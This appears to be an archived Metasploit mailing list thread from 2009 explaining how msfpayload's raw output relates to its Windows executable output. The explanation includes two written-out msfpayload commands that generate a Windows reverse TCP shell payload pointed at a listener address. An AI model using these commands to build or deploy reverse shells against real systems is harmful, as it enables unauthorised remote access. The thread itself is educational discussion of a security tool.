Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

raw format of msfpayload

From: anastasiosm at gmail.com (Anastasios Monachos)
Date: Tue, 7 Apr 2009 14:47:54 +0100
Antonios,

I think that's correct. If you do:

./msfpayload windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=1234 R >
temp.raw
and
./msfpayload windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=1234 X >
temp.exe

then open up both files with a hex editor you will see that temp.raw
contents are included in the temp.exe

The different in sizes (thus data) between the raw and executable output is
the the information necessary for the Windows OS loader to manage the
wrapped executable code (or if you like the temp.raw).

Hope that helps.
Tasos

2009/4/7 Antonios Atlasis <atlasis at telecom.ece.ntua.gr>


Hello to everybody,

I'd like to clarify something, if possible, please. The raw output format
of msfpayload is machine language, excluding PE headers of "normal" exe
files, correct?

Thanks in advance

Antonios

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework





-- 
AM
Key ID: 0x5EB17EE7
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090407/134dd9a3/attachment.htm>
Previous By Date Next
Previous By Thread Next

Current thread: